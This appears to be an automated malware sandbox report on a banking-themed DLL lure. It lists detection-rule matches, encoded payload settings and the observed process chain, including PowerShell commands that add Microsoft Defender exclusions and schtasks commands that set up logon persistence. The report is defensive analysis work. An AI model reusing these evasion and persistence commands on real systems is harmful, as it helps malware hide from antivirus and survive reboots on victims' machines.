                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: regasms.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: AtkzppDHiyvcIR.exe.13.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Settings.cs | Base64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Settings.cs | Base64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Settings.cs | Base64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Settings.cs | Base64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, lVRdylhA8jubWD8j1x.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, lVRdylhA8jubWD8j1x.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs | Security API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, lVRdylhA8jubWD8j1x.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@58/22@2/2
                  Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\user\AppData\Roaming\regasms.exe
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Mutant created: \Sessions\1\BaseNamedObjects\AevgPZBLIVkjbJsbumvdFn
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Mutant created: \Sessions\1\BaseNamedObjects\tnybaidkzovl
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:968:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | File created: C:\Users\user\AppData\Local\Temp\tmp18B1.tmp
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dll | ReversingLabs: Detection: 36%
                  Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll"
                  Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                  Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                  Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen
                  Source: C:\Windows\System32\rundll32.exe | Process created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exe
                  Source: C:\Windows\System32\rundll32.exe | Process created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Process created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Process created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
